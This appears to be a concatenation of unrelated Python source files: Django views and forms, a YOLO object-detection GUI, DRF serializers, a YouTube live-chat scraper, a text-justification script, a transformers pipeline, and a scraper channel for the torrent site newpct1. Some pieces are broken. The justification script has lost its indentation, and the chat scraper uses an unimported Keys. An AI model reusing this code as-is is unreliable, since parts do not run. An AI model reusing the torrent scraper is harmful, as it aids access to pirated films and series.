        return super().form_valid(form)
    def form_invalid(self, form):
        """Surface a user-facing error when the submitted address fails validation."""
        # Message (Croatian): "Non-existent e-mail address."
        messages.add_message(self.request, level=messages.ERROR, message=_('Nepostojeća e-mail adresa.'))
        return super().form_invalid(form)
class PasswordResetConfirmView(BasePasswordResetConfirmView):
    """
    GET: Renders password change form.
    POST: Processes form and resets password.
    """
    # Overrides the URL token placeholder Django swaps in during the reset
    # flow ('nova' is Croatian for 'new') — NOTE(review): must match the URL
    # conf; verify against the project's urls module.
    INTERNAL_RESET_URL_TOKEN = 'nova'
    template_name = 'users/password_confirm.html'
    form_class = SetPasswordForm
    success_url = reverse_lazy('login')
    def form_valid(self, form):
        """Queue a success message, then let the base class save the new password."""
        # Message (Croatian): "Password changed."
        messages.add_message(self.request, level=messages.INFO, message=_('Lozinka promijenjena.'))
        return super().form_valid(form)
class HomeView(LoginRequiredMixin, ListView):
    """
    GET: Renders iteration listing for user.
    """
    template_name = 'home.html'
    model = Iteration
    context_object_name = 'iteration_list'
    def get_queryset(self):
        """
        Renders Iterations specific to logged in user.
        """
        # Filter the default queryset down to the requesting user's rows only.
        return super().get_queryset().filter(user=self.request.user)
class AlgorithmList(LoginRequiredMixin, ListView):
    """
    GET: Renders submenu with algoritm listings.
    """
    # NOTE(review): shares 'home.html' with HomeView — confirm this is
    # intentional and not a copy-paste leftover.
    template_name = 'home.html'
    model = Algorithm
    context_object_name = 'algorithm_list'
    def get_queryset(self):
        # Only active algorithms the logged-in user has been granted access to.
        return super().get_queryset().filter(users=self.request.user, is_active=True)
class AlgorithmDetail(LoginRequiredMixin, DetailView):
    """
    GET: Renders submenu with algoritm listings.
    """
    template_name = 'algorithm.html'
    model = Algorithm
    def get_queryset(self):
        # Restrict lookups to active algorithms assigned to the requesting
        # user — unauthorized ids resolve to 404 via the filtered queryset.
        return super().get_queryset().filter(users=self.request.user, is_active=True)
class IterationCreateView(LoginRequiredMixin, CreateView):
    """
    GET: Renders form to create Iteration.
    POST: Processes form and creates Iteration instance.
    """
    template_name = 'create_iteration.html'
    model = Iteration
    form_class = IterationCreateForm
    success_url = reverse_lazy('home')
    def get_form_kwargs(self):
        """Inject the requesting user so the form can bind the new Iteration to them."""
        kwargs = super().get_form_kwargs()
        kwargs['user'] = self.request.user
        return kwargs
class IterationView(LoginRequiredMixin, UserPassesTestMixin, DetailView):
    """
    GET: Renders Iteration details. Returns 403 if logged user is not parent to Iteration.
    """
    template_name = 'iteration.html'
    model = Iteration
    # With raise_exception, a failed test_func yields PermissionDenied (403)
    # instead of redirecting to the login page.
    raise_exception = True
    def test_func(self):
        """Allow access only to the owner of the requested Iteration."""
        # Return the comparison directly (idiom) instead of the original
        # `if ...: return True / return False` chain.
        return self.request.user == self.get_object().user
|
983,786 | dcc94a72d205ad9a998792f2c1015ce989d5c5ae | import tkinter as tk
from PIL import Image, ImageTk
from tkinter.filedialog import askopenfilename
import numpy as np
import imutils
import time
import cv2
import os
import pyttsx3
# --- GUI setup -------------------------------------------------------------
root = tk.Tk()
root.title("object Detector")
root.geometry("800x550")
root.configure(background ="white")
title = tk.Label(text="Click below button to select picture", background = "white", fg="Brown", font=("", 15))
title.grid(row=0, column=2, padx=10, pady = 10)
# One time initialization of the text-to-speech engine
engine = pyttsx3.init()
# Set properties _before_ you add things to say
engine.setProperty('rate', 125)    # Speed percent (can go over 100)
engine.setProperty('volume', 1)    # Volume 0-1
# load the COCO class labels our YOLO model was trained on
LABELS = open("coco.names").read().strip().split("\n")
# load our YOLO object detector trained on COCO dataset (80 classes)
print("[INFO] loading YOLO from disk...")
net = cv2.dnn.readNetFromDarknet("yolov3.cfg", "yolov3.weights")
# initialize a list of colors to represent each possible class label
np.random.seed(42)  # fixed seed -> stable colors across runs
COLORS = np.random.randint(0, 255, size=(len(LABELS), 3),
	dtype="uint8")
# Resolve the YOLO output-layer names. getUnconnectedOutLayers() returns
# 1-based indices whose shape differs across OpenCV versions (Nx1 array in
# <= 4.5.3, flat array in >= 4.5.4); normalizing through numpy's flatten()
# makes the original `ln[i[0] - 1]` indexing work on both.
ln = net.getLayerNames()
ln = [ln[i - 1] for i in np.array(net.getUnconnectedOutLayers()).flatten()]
def clear():
    """Dismiss the detection result: drop the result label and close the
    OpenCV preview window."""
    rtitle.destroy()
    cv2.destroyAllWindows()
def analysis():
    """Run YOLO object detection on the image at the module-level ``path``,
    draw labelled boxes, show the coarse position of each object in the GUI
    and speak the result aloud.

    Reads globals: path, net, ln, LABELS, COLORS, engine.
    Writes global: rtitle (the Tk result label, destroyed by clear()).
    """
    global rtitle
    (W, H) = (None, None)
    frame = cv2.imread(path)
    frame = imutils.resize(frame, width=400)
    # if the frame dimensions are empty, grab them
    if W is None or H is None:
        (H, W) = frame.shape[:2]
    # Preprocess: scale to [0,1], resize to the 416x416 YOLO input, swap BGR->RGB.
    blob = cv2.dnn.blobFromImage(frame, 1 / 255.0, (416, 416),
        swapRB=True, crop=False)
    net.setInput(blob)
    start = time.time()
    layerOutputs = net.forward(ln)
    end = time.time()
    # initialize our lists of detected bounding boxes, confidences,
    # and class IDs, respectively
    boxes = []
    confidences = []
    classIDs = []
    centers = []
    # loop over each of the layer outputs
    for output in layerOutputs:
        # loop over each of the detections
        for detection in output:
            # extract the class ID and confidence (i.e., probability)
            # of the current object detection
            scores = detection[5:]
            classID = np.argmax(scores)
            confidence = scores[classID]
            # filter out weak predictions by ensuring the detected
            # probability is greater than the minimum probability
            if confidence > 0.5:
                # scale the bounding box coordinates back relative to
                # the size of the image, keeping in mind that YOLO
                # actually returns the center (x, y)-coordinates of
                # the bounding box followed by the boxes' width and
                # height
                box = detection[0:4] * np.array([W, H, W, H])
                (centerX, centerY, width, height) = box.astype("int")
                # use the center (x, y)-coordinates to derive the top
                # and and left corner of the bounding box
                x = int(centerX - (width / 2))
                y = int(centerY - (height / 2))
                # update our list of bounding box coordinates,
                # confidences, and class IDs
                boxes.append([x, y, int(width), int(height)])
                confidences.append(float(confidence))
                classIDs.append(classID)
                centers.append((centerX, centerY))
    # apply non-maxima suppression to suppress weak, overlapping
    # bounding boxes
    idxs = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.3)
    texts = []
    # ensure at least one detection exists
    if len(idxs) > 0:
        # loop over the indexes we are keeping
        for i in idxs.flatten():
            # extract the bounding box coordinates
            (x, y) = (boxes[i][0], boxes[i][1])
            (w, h) = (boxes[i][2], boxes[i][3])
            # draw a bounding box rectangle and label on the frame
            color = [int(c) for c in COLORS[classIDs[i]]]
            cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)
            text = "{}: {:.4f}".format(LABELS[classIDs[i]],
                confidences[i])
            cv2.putText(frame, text, (x, y - 5),
                cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
            # find positions of objects: split the image into a 3x3 grid
            # and report which cell the detection center falls into.
            centerX, centerY = centers[i][0], centers[i][1]
            if centerX <= W/3:
                W_pos = "left "
            elif centerX <= (W/3 * 2):
                W_pos = "center "
            else:
                W_pos = "right "
            if centerY <= H/3:
                H_pos = "top "
            elif centerY <= (H/3 * 2):
                H_pos = "mid "
            else:
                H_pos = "bottom "
            texts.append(H_pos + W_pos + LABELS[classIDs[i]])
    rtitle = tk.Label(text=texts, background = "white", font=("", 15))
    rtitle.grid(row=2, column=4, padx=10, pady = 10)
    cv2.imshow("Image", frame)
    clearbutton = tk.Button(text="Clear", command=clear)
    clearbutton.grid(row=5, column=2, padx=10, pady = 10)
    if texts:
        finaltext = ', '.join(texts)
        engine.say(finaltext)
        # Flush the say() queue and play the audio
        engine.runAndWait()
def openphoto():
    """Ask the user for a .jpg image, preview it in the GUI and offer an
    'Analyse Image' button.

    Stores the chosen file path in the module-level ``path`` global, which
    analysis() later reads.
    """
    global path
    selected = askopenfilename(filetypes=[("Image File", '.jpg')])
    if not selected:
        # Dialog cancelled: keep the previous state instead of crashing
        # (the original fell through to cv2.imread('') and blew up).
        return
    path = selected
    frame = cv2.imread(path)
    cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
    cv2image = imutils.resize(cv2image, width=250)
    img = Image.fromarray(cv2image)
    tkimage = ImageTk.PhotoImage(img)
    myvar = tk.Label(root, image=tkimage, height="224", width="224")
    # Keep a reference on the widget so Tk's image isn't garbage-collected.
    myvar.image = tkimage
    myvar.place(x=1, y=0)
    myvar.grid(row=3, column=2, padx=10, pady=10)
    button2 = tk.Button(text="Analyse Image", command=analysis)
    button2.grid(row=4, column=2, padx=10, pady=10)
def capture():
    """Grab one frame from the default webcam, save it to disk, preview it
    in the GUI and offer an 'Analyse Image' button.

    Stores the saved file path in the module-level ``path`` global.
    """
    global path
    cam = cv2.VideoCapture(0)
    time.sleep(0.5)  # give the camera a moment to warm up
    ret, img = cam.read()
    cam.release()
    if not ret:
        # Camera failed to deliver a frame (original ignored `ret` and kept
        # an unused `captured` variable); leave previous state untouched.
        return
    cv2.imwrite("./Captured_images/Captured.jpg", img)
    path = "./Captured_images/Captured.jpg"
    frame = cv2.imread(path)
    cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)
    cv2image = imutils.resize(cv2image, width=250)
    img = Image.fromarray(cv2image)
    tkimage = ImageTk.PhotoImage(img)
    myvar = tk.Label(root, image=tkimage, height="224", width="224")
    # Keep a reference on the widget so Tk's image isn't garbage-collected.
    myvar.image = tkimage
    myvar.place(x=1, y=0)
    myvar.grid(row=3, column=2, padx=10, pady=10)
    button2 = tk.Button(text="Analyse Image", command=analysis)
    button2.grid(row=4, column=2, padx=10, pady=10)
def vedio1():
    """Run YOLO detection over 'video.mp4' frame by frame, drawing boxes,
    updating the GUI result label and speaking detections per frame.

    Reads globals: net, ln, LABELS, COLORS, engine.
    """
    vs = cv2.VideoCapture("video.mp4")
    (W, H) = (None, None)
    # loop over frames from the video file stream
    while True:
        # read the next frame from the file
        (grabbed, frame) = vs.read()
        # if the frame was not grabbed, then we have reached the end
        # of the stream
        if not grabbed:
            break
        # BUGFIX: resize only after the grabbed check — the original called
        # imutils.resize(None) at end-of-stream and crashed.
        frame = imutils.resize(frame, width=400)
        # if the frame dimensions are empty, grab them
        if W is None or H is None:
            (H, W) = frame.shape[:2]
        # construct a blob from the input frame and then perform a forward
        # pass of the YOLO object detector, giving us our bounding boxes
        # and associated probabilities
        blob = cv2.dnn.blobFromImage(frame, 1 / 255.0, (416, 416),
            swapRB=True, crop=False)
        net.setInput(blob)
        start = time.time()
        layerOutputs = net.forward(ln)
        end = time.time()
        # initialize our lists of detected bounding boxes, confidences,
        # and class IDs, respectively
        boxes = []
        confidences = []
        classIDs = []
        centers = []
        # loop over each of the layer outputs
        for output in layerOutputs:
            # loop over each of the detections
            for detection in output:
                # extract the class ID and confidence (i.e., probability)
                # of the current object detection
                scores = detection[5:]
                classID = np.argmax(scores)
                confidence = scores[classID]
                # filter out weak predictions by ensuring the detected
                # probability is greater than the minimum probability
                if confidence > 0.5:
                    # scale the bounding box coordinates back relative to
                    # the size of the image; YOLO returns the center
                    # (x, y)-coordinates followed by width and height
                    box = detection[0:4] * np.array([W, H, W, H])
                    (centerX, centerY, width, height) = box.astype("int")
                    # derive the top-left corner of the bounding box
                    x = int(centerX - (width / 2))
                    y = int(centerY - (height / 2))
                    # update our list of bounding box coordinates,
                    # confidences, and class IDs
                    boxes.append([x, y, int(width), int(height)])
                    confidences.append(float(confidence))
                    classIDs.append(classID)
                    centers.append((centerX, centerY))
        # apply non-maxima suppression to suppress weak, overlapping
        # bounding boxes
        idxs = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.3)
        texts = []
        # ensure at least one detection exists
        if len(idxs) > 0:
            # loop over the indexes we are keeping
            for i in idxs.flatten():
                # extract the bounding box coordinates
                (x, y) = (boxes[i][0], boxes[i][1])
                (w, h) = (boxes[i][2], boxes[i][3])
                # draw a bounding box rectangle and label on the frame
                color = [int(c) for c in COLORS[classIDs[i]]]
                cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)
                text = "{}: {:.4f}".format(LABELS[classIDs[i]],
                    confidences[i])
                cv2.putText(frame, text, (x, y - 5),
                    cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
                # find positions of objects: report which cell of a 3x3
                # grid the detection center falls into
                centerX, centerY = centers[i][0], centers[i][1]
                if centerX <= W/3:
                    W_pos = "left "
                elif centerX <= (W/3 * 2):
                    W_pos = "center "
                else:
                    W_pos = "right "
                if centerY <= H/3:
                    H_pos = "top "
                elif centerY <= (H/3 * 2):
                    H_pos = "mid "
                else:
                    H_pos = "bottom "
                texts.append(H_pos + W_pos + LABELS[classIDs[i]])
        rtitle = tk.Label(text=texts, background = "white", font=("", 15))
        rtitle.grid(row=2, column=4, padx=10, pady = 10)
        cv2.imshow("Image", frame)
        clearbutton = tk.Button(text="Clear", command=clear)
        clearbutton.grid(row=5, column=2, padx=10, pady = 10)
        if texts:
            finaltext = ', '.join(texts)
            engine.say(finaltext)
            # Flush the say() queue and play the audio
            engine.runAndWait()
    # Release the video handle (the original leaked it).
    vs.release()
# --- Wire up the three top-level controls and start the Tk event loop. ---
button1 = tk.Button(text="Select Photo", command = openphoto)
button1.grid(row=1, column=2, padx=10, pady = 10)
capbut = tk.Button(text="Capture", command = capture)
capbut.grid(row=2, column=2, padx=10, pady = 10)
vidbut = tk.Button(text="video", command = vedio1)
vidbut.grid(row=1, column=3, padx=10, pady = 10)
# Blocks until the window is closed.
root.mainloop()
print("[INFO] Closing ALL")
print("[INFO] Closed")
|
983,787 | 89b81d2dee45ecc86d8c5ee66401c5aaaa29c0e1 | from django import forms
class LoginForm(forms.Form):
    """Username/password login form rendered with 'input100'-styled widgets."""
    username = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'text', 'name': 'username', 'placeholder': 'Type your username'}))
    # FIX: use PasswordInput (renders type="password") — the original TextInput
    # showed the password in clear text, and its placeholder was a copy-paste
    # of the username one ("Type your username").
    password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'input100', 'name': 'password', 'placeholder': 'Type your password'}))
class RegistrationForm(forms.Form):
    """User registration form with 'input100'-styled widgets.

    NOTE(review): password/confirm_password equality is not validated here —
    presumably checked in the view; confirm against the caller.
    """
    firstname = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'text', 'name': 'firstname', 'placeholder': 'Type your firstname'}))
    lastname = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'text', 'name': 'lastname', 'placeholder': 'Type your lastname'}))
    email = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'email', 'name': 'email', 'placeholder': 'Type your email'}))
    username = forms.CharField(widget=forms.TextInput(attrs={'class': 'input100', 'type': 'text', 'name': 'username', 'placeholder': 'Type your username'}))
    # FIX: PasswordInput masks the typed value; the original TextInput with a
    # type attr still rendered type="text" fields exposing the password.
    password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'input100', 'name': 'password', 'placeholder': 'Type your password'}))
    confirm_password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'input100', 'name': 'confirm-password', 'placeholder': 'Type your password again'}))
983,788 | 6b7730fdeec85f42a4a3db217ec6dc59eac96c46 | """Series serializers."""
# Django REST Framework
from rest_framework import serializers
# Models
from seriesapi.series.models import Serie, Season, Episode
class EpisodeModelSerializer(serializers.ModelSerializer):
    """Episode model serializer.

    Exposes only the episode title; nested inside SeasonModelSerializer.
    """
    class Meta:
        """Meta class."""
        model = Episode
        fields = ('title', )
class SeasonModelSerializer(serializers.ModelSerializer):
    """Season model serializer.

    Serializes a season's title together with its nested episodes
    (read-oriented: nested many=True without create/update overrides).
    """
    episodes = EpisodeModelSerializer(many=True)
    class Meta:
        """Meta class."""
        model = Season
        fields = ('title', 'episodes')
class SerieModelSerializer(serializers.ModelSerializer):
    """Serie model serializer.

    Top of the nesting chain: serie -> seasons -> episodes.
    """
    seasons = SeasonModelSerializer(many=True)
    class Meta:
        """Meta class."""
        model = Serie
        fields = ('title', 'description', 'seasons')
|
983,789 | 43565a196265d473081101eaf3c31156a5a1a85c | from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.common.exceptions import TimeoutException
import string
from helperfunctions import *
import time
# Python 2 script (raw_input, string.replace): scrapes a YouTube live stream's
# metadata and live-chat messages for a user-given number of minutes, then
# writes them to a spreadsheet via create_youtube_excel_live (helperfunctions).
try:
    start_time = time.time()
    url = raw_input("Please enter a url: ")
    num = raw_input("Please enter number of minutes you would like the program to run: ")
    driver = webdriver.Firefox()
    # Create a popup url for the detached live-chat view
    popup_url = string.replace(url, "watch", "live_chat")
    popup_url = popup_url.strip(" ") + "&is_popout=1"
    driver.get(url)
    window_youtube = driver.window_handles[0]
    driver.implicitly_wait(30)
    # Scrape video title, upload date, view count and channel name from the
    # main watch page (XPaths tied to YouTube's DOM at time of writing).
    tmp_video_name = WebDriverWait(driver,20).until(EC.presence_of_element_located
                                                ((By.XPATH, """// *[ @ id = "container"] / h1""")))
    video_name = tmp_video_name.text
    time.sleep(10)
    tmp_date = WebDriverWait(driver, 10).until(EC.presence_of_element_located
                                                ((By.XPATH, """//*[@id="upload-info"]""")))
    date = tmp_date.text
    time.sleep(2)
    tmp_views = WebDriverWait(driver, 10).until(EC.presence_of_element_located
                                               ((By.XPATH, """//*[@id="count"]""")))
    views = tmp_views.text
    time.sleep(2)
    tmpauthor_name = WebDriverWait(driver, 10).until(EC.presence_of_element_located
                                               ((By.XPATH, """ //*[@id="owner-name"]/a""")))
    author_name = tmpauthor_name.text
    time.sleep(10)
    # second tab: open the popped-out live chat
    driver.execute_script("window.open('about:blank', 'tab2');")
    driver.switch_to.window("tab2")
    driver.get(popup_url)
    driver.implicitly_wait(30)
    SCROLL_PAUSE = 10
    full_authorlist = []
    full_commentlist = []
    # Poll the chat until the requested number of minutes has elapsed.
    time_out = time.time() + 60*int(num)
    # comment_div = driver.find_element_by_xpath("""// *[ @ id = "message"] """)
    while True:
        comment_div = driver.find_element_by_xpath("""// *[ @ id = "message"] """)
        comments = comment_div.find_elements_by_xpath("""// *[ @ id = "message"] """)
        authors = comment_div.find_elements_by_xpath("""//*[@id="author-name"]""")
        # NOTE(review): messages are re-read on every pass, so duplicates are
        # expected in the output lists — confirm downstream dedupes.
        for comment in comments:
            full_commentlist.append(comment.text)
        for author in authors:
            full_authorlist.append(author.text)
        # Scroll to the bottom so new chat messages keep loading.
        driver.find_element_by_tag_name('html').send_keys(Keys.END)
        time.sleep(SCROLL_PAUSE/2)
        if (time.time() > time_out):
            break
    create_youtube_excel_live(str(url), video_name, author_name, views, date, full_authorlist, full_commentlist)
except TimeoutException:
    print("TimeoutException")
    driver.quit()
finally:
    driver.quit()
|
983,790 | 5f173f0dc5b5a53b6370339e5ba23b0768f6106c | l=['WELCOME','TO','CCC','GOOD', 'LUCK', 'TODAY']
d={}
nu=int(input())
c=0
while l:
if c not in d:
d[c]=[[l[0]], len(l[0])+1]
l.remove(l[0])
elif (d[c][1]+len(l[0]))>nu:
d[c][1]=d[c][1]+1-len(d[c][0])
c=c+1
else:
d[c][0].append(l[0])
d[c][1]=d[c][1]+len(l[0])+1
l.remove(l[0])
d[max(d)][1]=d[max(d)][1]+1-len(d[max(d)][0])
for i in d:
e=''
h=nu-d[i][1]+1
if (len(d[i][0])-1)==0:
po=h
op=0
else:
po=h//(len(d[i][0])-1)
op=h%(len(d[i][0])-1)
for k in range(0, len(d[i][0])-1):
e=e+d[i][0][k]+'.'*po
if op>0:e=e+'.'
op=op-1
e=e+d[i][0][len(d[i][0])-1]
if len(d[i][0])==1:
e=e+'.'*po
print(e) |
983,791 | 0d14e2b2ece42ecb7bce3c8bf28b3c487c3697a8 | from typing import Union, Optional
import numpy as np
from transformers.pipelines import ArgumentHandler
from transformers import (
Pipeline,
PreTrainedTokenizer,
ModelCard
)
class MultiLabelPipeline(Pipeline):
    """Transformers pipeline for multi-label classification.

    Applies an element-wise sigmoid to the model logits (labels are treated
    as independent) and returns, per input, every label whose probability
    exceeds ``threshold``.
    """
    def __init__(
            self,
            model: Union["PreTrainedModel", "TFPreTrainedModel"],
            tokenizer: PreTrainedTokenizer,
            modelcard: Optional[ModelCard] = None,
            framework: Optional[str] = None,
            task: str = "",
            args_parser: ArgumentHandler = None,
            device: int = -1,
            binary_output: bool = False,
            threshold: float = 0.3
    ):
        super().__init__(
            model=model,
            tokenizer=tokenizer,
            modelcard=modelcard,
            framework=framework,
            args_parser=args_parser,
            device=device,
            binary_output=binary_output,
            task=task
        )
        # Minimum sigmoid probability for a label to be reported.
        self.threshold = threshold
    def __call__(self, *args, **kwargs):
        """Run the base pipeline, then collect per-item labels above threshold.

        Returns a list of ``{"labels": [...], "scores": [...]}`` dicts, one
        per input.
        """
        outputs = super().__call__(*args, **kwargs)
        scores = 1 / (1 + np.exp(-outputs))  # sigmoid over raw logits
        results = []
        for item in scores:
            labels = []
            # FIX: use a distinct name — the original rebound `scores` here,
            # shadowing the array being iterated by the outer loop.
            item_scores = []
            for idx, s in enumerate(item):
                if s > self.threshold:
                    labels.append(self.model.config.id2label[idx])
                    item_scores.append(s)
            results.append({"labels": labels, "scores": item_scores})
        return results
|
983,792 | df2accd0359f31bce9fbba9c4e585b9838025073 | # -*- coding: utf-8 -*-
import re
from channelselector import get_thumb
from core import httptools
from core import scrapertools
from core import servertools
from core.item import Item
from platformcode import config, logger
from core import tmdb
host = 'http://newpct1.com/'
def mainlist(item):
    """Build the channel root menu: movies, series and a search entry."""
    logger.info()
    entries = [
        Item(channel=item.channel, action="submenu", title="Películas", url=host,
             extra="peliculas", thumbnail=get_thumb("channels_movie.png")),
        Item(channel=item.channel, action="submenu", title="Series", url=host, extra="series",
             thumbnail=get_thumb("channels_tvshow.png")),
        Item(channel=item.channel, action="search", title="Buscar", url=host + "buscar",
             thumbnail=get_thumb("search.png")),
    ]
    return entries
def submenu(item):
    """List the site's sub-categories for movies or series (item.extra),
    adding an extra alphabetical-browse entry per category."""
    logger.info()
    itemlist = []
    # Strip newlines/tabs/HTML comments, then transcode the page from latin-1.
    data = re.sub(r"\n|\r|\t|\s{2}|(<!--.*?-->)", "", httptools.downloadpage(item.url).data)
    data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
    patron = '<li><a href="http://(?:www.)?newpct1.com/' + item.extra + '/">.*?<ul>(.*?)</ul>'
    data = scrapertools.get_match(data, patron)
    patron = '<a href="([^"]+)".*?>([^>]+)</a>'
    matches = re.compile(patron, re.DOTALL).findall(data)
    for scrapedurl, scrapedtitle in matches:
        title = scrapedtitle.strip()
        url = scrapedurl
        itemlist.append(Item(channel=item.channel, action="listado", title=title, url=url, extra="pelilist"))
        # Companion entry for browsing the same category alphabetically.
        itemlist.append(
            Item(channel=item.channel, action="alfabeto", title=title + " [A-Z]", url=url, extra="pelilist"))
    return itemlist
def alfabeto(item):
    """List the A-Z index links of a category page (one entry per letter)."""
    logger.info()
    itemlist = []
    # Strip newlines/tabs/HTML comments, then transcode the page from latin-1.
    data = re.sub(r"\n|\r|\t|\s{2}|(<!--.*?-->)", "", httptools.downloadpage(item.url).data)
    data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
    patron = '<ul class="alfabeto">(.*?)</ul>'
    data = scrapertools.get_match(data, patron)
    patron = '<a href="([^"]+)"[^>]+>([^>]+)</a>'
    matches = re.compile(patron, re.DOTALL).findall(data)
    for scrapedurl, scrapedtitle in matches:
        title = scrapedtitle.upper()
        url = scrapedurl
        itemlist.append(Item(channel=item.channel, action="listado", title=title, url=url, extra=item.extra))
    return itemlist
def listado(item):
    """Scrape a listing page into movie/series Items, paginating manually:
    the first pass shows at most 30 results (next_page 'b' continues with
    the remainder before following the site's real "Next" link)."""
    logger.info()
    itemlist = []
    url_next_page =''
    data = re.sub(r"\n|\r|\t|\s{2}|(<!--.*?-->)", "", httptools.downloadpage(item.url).data)
    data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
    #logger.debug(data)
    logger.debug('item.modo: %s'%item.modo)
    logger.debug('item.extra: %s'%item.extra)
    # Fresh visit: isolate the listing's <ul>; a 'next' continuation scans
    # the whole downloaded page instead.
    if item.modo != 'next' or item.modo =='':
        logger.debug('item.title: %s'% item.title)
        patron = '<ul class="' + item.extra + '">(.*?)</ul>'
        logger.debug("patron=" + patron)
        fichas = scrapertools.get_match(data, patron)
        page_extra = item.extra
    else:
        fichas = data
        page_extra = item.extra
    patron = '<a href="([^"]+).*?' # the url
    patron += 'title="([^"]+).*?' # the title
    patron += '<img src="([^"]+)"[^>]+>.*?' # the thumbnail
    patron += '<span>([^<].*?)<' # the quality
    matches = re.compile(patron, re.DOTALL).findall(fichas)
    logger.debug('item.next_page: %s'%item.next_page)
    # Pagination
    if item.next_page != 'b':
        if len(matches) > 30:
            url_next_page = item.url
            matches = matches[:30]
            next_page = 'b'
            modo = 'continue'
    else:
        matches = matches[30:]
        next_page = 'a'
        patron_next_page = '<a href="([^"]+)">Next<\/a>'
        matches_next_page = re.compile(patron_next_page, re.DOTALL).findall(data)
        modo = 'continue'
        if len(matches_next_page) > 0:
            url_next_page = matches_next_page[0]
            modo = 'next'
    for scrapedurl, scrapedtitle, scrapedthumbnail, calidad in matches:
        url = scrapedurl
        title = scrapedtitle
        thumbnail = scrapedthumbnail
        action = "findvideos"
        extra = ""
        # The release year is embedded in the thumbnail file name.
        year = scrapertools.find_single_match(scrapedthumbnail, r'-(\d{4})')
        if "1.com/series" in url:
            action = "episodios"
            extra = "serie"
            title = scrapertools.find_single_match(title, '([^-]+)')
            title = title.replace("Ver online", "", 1).replace("Descarga Serie HD", "", 1).replace("Ver en linea", "",
                                                                                                   1).strip()
        else:
            title = title.replace("Descargar", "", 1).strip()
            if title.endswith("gratis"): title = title[:-7]
        show = title
        if item.extra != "buscar-list":
            title = title + ' ' + calidad
        context = ""
        # Derive content type (movie/tvshow) and a clean title from the URL.
        context_title = scrapertools.find_single_match(url, "http://(?:www.)?newpct1.com/(.*?)/(.*?)/")
        if context_title:
            try:
                context = context_title[0].replace("descargar-", "").replace("pelicula", "movie").replace("series",
                                                                                                          "tvshow")
                context_title = context_title[1].replace("-", " ")
                if re.search('\d{4}', context_title[-4:]):
                    context_title = context_title[:-4]
                elif re.search('\(\d{4}\)', context_title[-6:]):
                    context_title = context_title[:-6]
            except:
                context_title = show
        logger.debug('contxt title: %s'%context_title)
        logger.debug('year: %s' % year)
        logger.debug('context: %s' % context)
        if not 'array' in title:
            itemlist.append(Item(channel=item.channel, action=action, title=title, url=url, thumbnail=thumbnail,
                                 extra = extra,
                                 show = context_title, contentTitle=context_title, contentType=context,
                                 context=["buscar_trailer"], infoLabels= {'year':year}))
    tmdb.set_infoLabels(itemlist, True)
    if url_next_page:
        itemlist.append(Item(channel=item.channel, action="listado", title=">> Página siguiente",
                             url=url_next_page, next_page=next_page, folder=True,
                             text_color='yellow', text_bold=True, modo = modo, plot = extra,
                             extra = page_extra))
    return itemlist
def listado2(item):
    """Scrape a POST-driven listing (used by search): builds Items from the
    <ul class=item.pattern> block and follows the site's own pagination."""
    logger.info()
    itemlist = []
    data = re.sub(r"\n|\r|\t|\s{2,}", "", httptools.downloadpage(item.url, post=item.post).data)
    data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
    # Repair HTML entities the transcoding leaves behind.
    list_chars = [["&ntilde;", "ñ"]]
    for el in list_chars:
        data = re.sub(r"%s" % el[0], el[1], data)
    # Detect the next page number from the pagination widget; absence of a
    # match means this is the last page.
    try:
        get, post = scrapertools.find_single_match(data, '<ul class="pagination">.*?<a class="current" href.*?'
                                                         '<a\s*href="([^"]+)"(?:\s*onClick=".*?\'([^"]+)\'.*?")')
    except:
        post = False
    if post:
        if "pg" in item.post:
            item.post = re.sub(r"pg=(\d+)", "pg=%s" % post, item.post)
        else:
            item.post += "&pg=%s" % post
    pattern = '<ul class="%s">(.*?)</ul>' % item.pattern
    data = scrapertools.get_match(data, pattern)
    pattern = '<li><a href="(?P<url>[^"]+)".*?<img src="(?P<img>[^"]+)"[^>]+>.*?<h2.*?>\s*(?P<title>.*?)\s*</h2>'
    matches = re.compile(pattern, re.DOTALL).findall(data)
    for url, thumb, title in matches:
        # fix encoding for title
        real_title = scrapertools.find_single_match(title, r'font color.*?font.*?><b>(.*?)<\/b><\/font>')
        title = scrapertools.htmlclean(title)
        title = title.replace("�", "ñ")
        # skip anything that is not a video
        if "/juego/" in url or "/varios/" in url:
            continue
        if ".com/series" in url:
            show = real_title
            itemlist.append(Item(channel=item.channel, action="episodios", title=title, url=url, thumbnail=thumb,
                                 context=["buscar_trailer"], contentSerieName=show))
        else:
            itemlist.append(Item(channel=item.channel, action="findvideos", title=title, url=url, thumbnail=thumb,
                                 context=["buscar_trailer"]))
    if post:
        itemlist.append(item.clone(channel=item.channel, action="listado2", title=">> Página siguiente",
                                   thumbnail=get_thumb("next.png")))
    return itemlist
def findvideos(item):
    """Extract the playable links of a title: the torrent link plus the
    streaming ('ver') and direct-download link tables, one Item per link."""
    logger.info()
    itemlist = []
    ## Any of the three URL variants is valid
    # item.url = item.url.replace("1.com/","1.com/ver-online/")
    # item.url = item.url.replace("1.com/","1.com/descarga-directa/")
    item.url = item.url.replace("1.com/", "1.com/descarga-torrent/")
    # Download the page
    data = re.sub(r"\n|\r|\t|\s{2}|(<!--.*?-->)", "", httptools.downloadpage(item.url).data)
    data = unicode(data, "iso-8859-1", errors="replace").encode("utf-8")
    title = scrapertools.find_single_match(data, "<h1><strong>([^<]+)</strong>[^<]+</h1>")
    title += scrapertools.find_single_match(data, "<h1><strong>[^<]+</strong>([^<]+)</h1>")
